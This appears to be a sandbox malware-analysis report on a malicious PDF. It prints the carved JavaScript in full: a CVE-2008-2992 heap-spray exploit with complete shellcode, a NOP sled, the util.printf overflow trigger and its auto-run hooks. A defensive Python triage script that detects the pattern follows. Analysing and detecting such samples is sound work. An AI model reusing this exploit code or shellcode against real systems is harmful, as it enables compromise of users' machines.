Malicious PDF — malware analysis report

Static analysis result for SHA-256 358d66f3bb25c6e6…

MALICIOUS

PDF

Size: 1.95 MB
Authoring application: Python PDF Library - http://pybrary.net/pyPdf/ (PDF literal-string octal escapes \055, \072, \057 and \056 decoded)
First seen: 2026-05-11
MD5: a28f323f720c2c6d0b55f5a6b7e761ce
SHA-1: 54f04bf7e6c39b614fe94510d9436b7342c7c577
SHA-256: 358d66f3bb25c6e65b9451a9f0e5aa876f185989a318decc8774ab0b151f7a1f
Risk score: 308

Malware Insights

MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript

The PDF carries embedded JavaScript in the /JS stream of object 9 (PDF_JAVASCRIPT and PDF_JS heuristics). The PDF_UNESCAPE heuristic fires on the unescape() calls that build the NOP sled and shellcode; beyond that %u-encoding the script is not obfuscated. The extracted artifact javascript_obj0009_000.js is a heap-spray exploit rather than a downloader: it builds roughly 1,400 blocks of 0x9090 filler (each about 0x40000 UTF-16 code units) followed by 340 bytes of shellcode, then calls util.printf with a 2147483647-character %f field width, the trigger associated with CVE-2008-2992. The trigger is scheduled with app.setTimeOut after 1,200 ms when the document runs inside a browser plug-in (this.external) and is otherwise attached to the document's WillClose action. What the shellcode does once it runs (fetching or dropping a second stage) is not determined by static analysis. The document has no body text, so the lure cannot be identified, but the spray paired with the malformed util.printf argument is sufficient to establish malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (a 0x90 NOP sled with unescape()-decoded shellcode, or a multi-kilobyte app.setTimeOut/setInterval launcher) with the util.printf sink patched for CVE-2008-2992. Benign documents do not pair heap-spray staging with a util.printf call whose %f field width runs into the billions. The malformed argument may be assembled at run time, so this rule attributes the exploit to a known pre-2011 Reader CVE family rather than to the exact primitive.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function exploit() {
    var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4dff%u25ab%uf2f0%u4049%uc6a0%u9a0a%ue86f%u9a0a%udc6f%u0207%ud88b%u9a0a%u826f%u3415%uc1df%u9a0a%u756f%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970% …
    blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0009_000.js | pdf-javascript-stream | PDF /JS object 9 at offset 0x2EE | 1806 bytes
SHA-256: 7c11497226e12f3863cdbebc0ce22d62b411ec0c7a0346b9dc650ce60a5126ac
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function repeat(count,what) {
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4dff%u25ab%uf2f0%u4049%uc6a0%u9a0a%ue86f%u9a0a%udc6f%u0207%ud88b%u9a0a%u826f%u3415%uc1df%u9a0a%u756f%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u71be%u9b25%ua5bf%ucf34%u73cd%uc71b%ua2f2%ude32%ub909%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("%2147483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else
          this.setAction("WillClose","exploit()");
javascript_obj0009_000_shellcode_00.bin | pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0x2EE | 340 bytes
SHA-256: 6590991eea38661d777f210c92b4a390a4eb305edcd9f92fa315827dcea23e40
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (percent-decode) from JavaScript object 9 at offset 0x2EE | 1804 bytes
SHA-256: 7700078ae75edd7a1493b6906cd7a66de949af683e5d0039ec9b39e7b482bdf6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
The recovered stage is identical to the script shown for javascript_obj0009_000.js above except for the util.printf line, which the percent-decoding transform rewrote from
var s = util.printf("%2147483647.2147483647f",0);
to
var s = util.printf("!47483647.2147483647f",0);
The generic decoder treated the leading %21 of the format string as a URL-encoded '!', which is why this artifact is 2 bytes shorter (1804 versus 1806 bytes); the %uXXXX shellcode escapes were not touched. The original literal, not the recovered one, is the overflow argument that should be reported.
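The triage below is an added example, not code from the sandbox that produced this report or from the sample. It shows the two things a practitioner wants from the previews above: decoding only the unescape() literals into the bytes Reader would place on the heap (so the 340-byte shellcode and the 0x90 sled are recovered without mangling the util.printf format string, which is what the generic percent-decode stage did), and the PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY correlation of sled plus shellcode plus an absurd util.printf width. The script excerpt is constructed: it keeps only the first six shellcode words from the page, so it is not the real payload, and the 0xFFFF width threshold and 8-byte sled minimum are this example's own choices.

```python
import re
from urllib.parse import unquote

# Constructed excerpt modelled on the carved javascript_obj0009_000.js.
# Only the first six %u words of the real 340-byte shellcode are kept.
SAMPLE_JS = r'''
function repeat(count,what) { var v = ""; while (--count >= 0) v += what; return v; }
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
var s = util.printf("%2147483647.2147483647f",0);
return s;
}
if (this.external) app.setTimeOut("exploit()",1200);
else this.setAction("WillClose","exploit()");
'''

# A double-quoted string literal passed straight to unescape().
UNESCAPE_CALL = re.compile(r'unescape\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
# %uXXXX (one UTF-16 code unit) is tried before %XX (one byte).
ESCAPE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')
PRINTF_FLOAT = re.compile(r'util\.printf\(\s*"%(\d+)(?:\.\d+)?f"')


def js_unescape(literal: str) -> bytes:
    """Decode an unescape() literal into the bytes Reader stores in memory:
    %uXXXX -> the code unit's two little-endian bytes, %XX -> one byte,
    everything else copied through as Latin-1."""
    out = bytearray()
    pos = 0
    for m in ESCAPE.finditer(literal):
        out += literal[pos:m.start()].encode("latin-1")
        if m.group(1) is not None:
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += literal[pos:].encode("latin-1")
    return bytes(out)


def unescape_literals(js: str) -> list[bytes]:
    """Decode only unescape() arguments; the rest of the script is left
    alone so a format string such as "%2147483647f" survives intact."""
    return [js_unescape(m.group(1)) for m in UNESCAPE_CALL.finditer(js)]


def naive_percent_decode(js: str) -> str:
    """What a generic percent-decoding pass over the whole script does:
    %21 becomes '!' and %uXXXX is ignored, so the printf argument is
    mangled while the shellcode is not decoded at all."""
    return unquote(js)


def printf_width(js: str) -> int:
    """Largest field width handed to a util.printf %f conversion, 0 if none."""
    return max((int(m.group(1)) for m in PRINTF_FLOAT.finditer(js)), default=0)


def triage(js: str) -> dict:
    """Correlate NOP-sled spray staged through unescape() with an absurd
    util.printf width, the CVE-2008-2992 pairing described in the rule."""
    blobs = unescape_literals(js)
    nop_bytes = sum(b.count(b"\x90") for b in blobs)
    # A blob that is mostly 0x90 is sled filler; anything else is shellcode.
    shellcode = [b for b in blobs if b.count(b"\x90") < len(b) // 2]
    width = printf_width(js)
    heap_spray = nop_bytes >= 8 and bool(shellcode)   # example thresholds
    absurd_width = width > 0xFFFF                      # 2147483647 is INT_MAX
    return {
        "unescape_literals": len(blobs),
        "nop_bytes": nop_bytes,
        "shellcode_bytes": sum(len(b) for b in shellcode),
        "printf_width": width,
        "heap_spray": heap_spray,
        "util_printf_overflow": absurd_width,
        "verdict": "util.printf heap-spray exploit (CVE-2008-2992 family)"
        if heap_spray and absurd_width else "no known-CVE pattern",
    }


if __name__ == "__main__":
    print(triage(SAMPLE_JS))
    print(naive_percent_decode('util.printf("%2147483647.2147483647f",0)'))
```

Run against the full carved script, js_unescape() on the sc literal yields the same 340 bytes the sandbox saved as javascript_obj0009_000_shellcode_00.bin, while naive_percent_decode() reproduces the "!47483647" mangling seen in generic_stage_recovery_000.js.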